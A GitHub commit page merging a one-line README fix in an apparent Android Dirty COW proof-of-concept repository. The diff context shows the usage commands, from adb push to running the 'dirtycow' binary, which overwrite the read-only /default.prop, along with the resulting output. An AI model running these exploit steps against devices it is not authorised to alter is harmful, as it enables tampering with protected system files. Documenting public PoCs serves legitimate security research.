Skip to content

Commit

Permalink
Merge pull request #3 from Manouchehri/patch-1
Browse files Browse the repository at this point in the history
Fixed readme to match PoC.
  • Loading branch information
timwr authored Oct 23, 2016
2 parents c752eb1 + b4562fc commit ac9f181
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,7 @@ adb pull /default.prop default.prop
sed -i.bak s/ADDITIONAL_DEFAULT_PROPERTIES/ADDIRTYCOW_DEFAULT_PROPERTIES/g default.prop
adb push default.prop /data/local/tmp/default.prop
[100%] /data/local/tmp/default.prop
adb shell '/data/local/tmp/dirtycow /default.prop "`cat /data/local/tmp/default.prop`"'
adb shell '/data/local/tmp/dirtycow /default.prop /data/local/tmp/default.prop'
mmap 0x400f1000
^CMakefile:11: recipe for target 'run' failed
Expand Down

0 comments on commit ac9f181

Please sign in to comment.